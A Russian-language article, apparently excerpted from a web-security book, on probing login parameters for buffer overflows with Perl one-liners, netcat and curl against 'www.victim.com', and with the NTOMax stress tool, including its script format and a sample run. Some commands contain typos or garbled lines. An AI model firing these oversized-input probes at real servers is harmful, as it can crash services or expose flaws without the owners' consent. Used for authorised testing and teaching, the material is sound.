21/07/11 1 6468 Взлом средств проверки вводимы данных

Переполнение буфера при выполнении сценариев

Для выполнения взлома данного типа нужно всего лишь попытаться ввести как можно больше символов в поле ввода. Это самый грубый и неэлегантный взлом, однако его можно использовать в случае, когда приложение выдает пользователю информацию об ошибке. Взлому данного типа широко подвержены приложения, написанные на языке Perl. В этом языке достаточно просто с помощью одной команды создать строку ввода любой длины (ааааааа… повторяется 500 раз):

$perl –e   ‘prirt   “a”   x  500’

С помощью сценария, написанного на языке Perl, можно создать HTTP-запрос или же воспользоваться для этих целей утилитой netcat. Этот запрос необходимо ввести в строке ввода вместо корректного параметра, заключив его в символы обратной кавычки (`). Рассмотрим следующий пример:

$echo –e  “GET /login.php?user=faustus\nHTTP/1.0\n\n” | \
nc –vv www.victim.com 80

Далее показан пример исполнения Perl-сценария, вызываемого из командной строки:

$echo –е “GET /login.php?user=\
>`perl –e ‘print “a” x 500’´\nHTTP/l.0\n\n” | \
nc –vv www.victim.com 80

Этот простой сценарий посылает 500 раз символ к файлу login.php. Самое замечательное – это то, что данный сценарий может использоваться из командной строки любой UNIX-системы (или в пакете Cygwin под Windows). Например, применяя данный метод с программой curl, можно решить проблему взлома узла, защищенного с помощью протокола SSL:

$curl   https://www.victim.com/login.php?user=`perl –e ‘print “a” x 500’´

Кроме того, существует программа NTOMax, которая обеспечивает более широкие возможности для проведения проверки переполнения буфера. Преимуществом данного инструмента является то, что он поддерживает выполнение сценариев.

Скачать NTOMax 2.0:

NTOMax20.zip

Далее приведен простейший пример использования данной софтины (а точнее список возможностей):

C:\NTOMax20>NTOMax.exe /?
Seek and Destroy - Information Warfare
NTOMax v2.0 - Copyright(c) 1999, Foundstone, Inc.
Server stress tester for buffer overflow/DOS conditions
Programming by JD Glaser - All Rights Reserved
Usage - ntomax /s &lt; script.txt &gt; results.txt
/s = reads script from stdin
/? = Help
 
- Script Format -
host:[ip address],[port],[min],[max] = host parameters
Additional host parameters in order:
timeout - ms to wait for socket response - default = 0
delay - ms to wait before sending commands- default = 250
pause - ms to wait before receiving - default = 0
retnum - number of LF/CR's to end buffer - default is one
reopen - T/F reopen connection before each command
norecv - T/F no receive after intial connect - default is off
verbose - T/F verbose output- off by deault
trial - T/F diplay buffer w/o sending
Command synax:
c:[command text] = preloop coomands
lc:[command buffer] = loop commands
c:[command text] = post loop command
- Script Example -
host:12.12.12.2,80,400,500,5000,250,0,2,true,true
lc:GET /some * url/
lc:POST /some * url/
or a mail server example
host:12.12.12.2,110,40,50,5000,1000,4000,1,false,true
lc:user hac*ker
lc:pass hack*pass

Из приведенного примера видно, что главным преимуществом утилиты NTOMax является поддержка файлов сценариев. На первый взгляд, обилие параметров и сложность синтаксиса сбивает с толку, однако эта сложность вызвана чрезвычайно широкими возможностями данной программы, которая позволяет создавать оптимальные сценарии для проверки приложения на наличие изъянов. Для обеспечения корректного синтаксиса HTTP значение retnum необходимо установить равным 2. При использовании команд c или lc можно использовать символ звездочки для задания размера буфера. В некоторых случаях строку из 400 символов N можно заменить символами звездочки. Но все же у программы NTOMax есть и недостатки. Главным недостатком является то, что пользователь не может изменить символ буфера. Ниже приведен пример, в котором проверяется максимальный размер переменной value в файле сценария login.php:

length for the “user” variable to the login.php file contains:host:192.168.0.1,22,100,500,4000,250,0,2,true,true,true,false
lc:GET  /login.php?user=* HTTP/1.0

Данный сценарий выполняется 100 раз (размер буфера 500 минус минимальный размер буфера 400 символов). Далее запускается программа NTOMax:

C:\NTOMax20>NTOMax.exe /s &lt; script.txt
Seek and Destroy – Information Warfare
NTOMax v2.0 – Copyright(c) 1999, Foundstone, Inc.
*NOTICE – NTOMax is a stress test tool for professional administrators*
*Foundstone, Inc. assumes no liability for use/misuse of this tool*
Beginning scan on 192.168.0.1:80
Pinging host 192.168.0.1
Connecting…
Connected to 192.168.0.1 on 80
Starting test series...
Printing session values:
IP – 192.168.0.1
Port – 80
Min – 400
Max – 500
Timeout – 5000
Delay – 250
Loop Pause – 0
AddRet – 2
ReOpen – true
Verbose – true
TrialRun – false
Beginning loop command series...
Beginning loop test with 400 byte buffer...
Connected to 192.168.0.1 on 80
Trial Buffer – ‘GET/login.php?user=NNN...NNN HTTP/1.0
...продолжение тестирования для буферов длиной от 400 до 500...
Testing completed

После начала проверки приложения на наличие изъяна, обусловленного возможностью переполнения буфера, данное приложение начало возвращать различные сообщения об ошибках. Это могут быть ошибки типа “неверный пароль”, однако сведения, полученные в результате некоторых ошибок, могут нести важную информацию, такую как информация о граничных условиях для параметра user. При проверке приложения нужно придерживаться одного простого правила. Отправьте корректный запрос приложению и запишите его ответ. Отправьте первый буфер символов приложению и запищите результаты. Отошлите второй буфер и запишите результаты. И так далее. После того, как полученные ответы от приложения не будут совпадать, проанализируйте ошибки. Это правило может помочь в обнаружении достаточно серьезных изъянов приложений (таких как ограничение в 7809 символов косой черты в URL-адресе).

В некоторых случаях взлом средств проверки вводимых данных может предоставить хакеру возможность выполнения произвольных команд на сервере.

Подводя итог, можно сказать, что в первом случае использование сценариев на языке Perl предоставляет пользователю больше возможностей, однако для этого требуются более глубокие знания. При использовании утилиты NTOMax глубоких знаний не требуется, однако в этом случае возможности пользователя ограничиваются возможностями программы.

Чаще всего взломы с использованием переполнения буфера осуществляются «вслепую». Без доступа к приложению, без возможности исследования его в отладчике или просмотра системного журнала приложения очень трудно провести взлом с переполнением буфера, в результате которого появляется возможность выполнения команд. Например, без полного доступа к приложениям не была бы обнаружена ошибка, приводящая к появлению возможности переполнения буфера в программе FrontPage Service Extension на платформе сервера MS.

Читать еще...

Liu Jo Group - Новый лицензионный партнер Blugirl и Miss Blumarine Missoni выпускает экологически чистые кроссовки Какие есть читы для игры CS:GO и что они дают Isko и Soorty совместно разрабатывают коллекции тканей и одежды Что посмотреть: Новая коллекция Salvatore Ferragamo KCD приглашает Лауру Бирбрауэр в качестве партнера в Fashion Services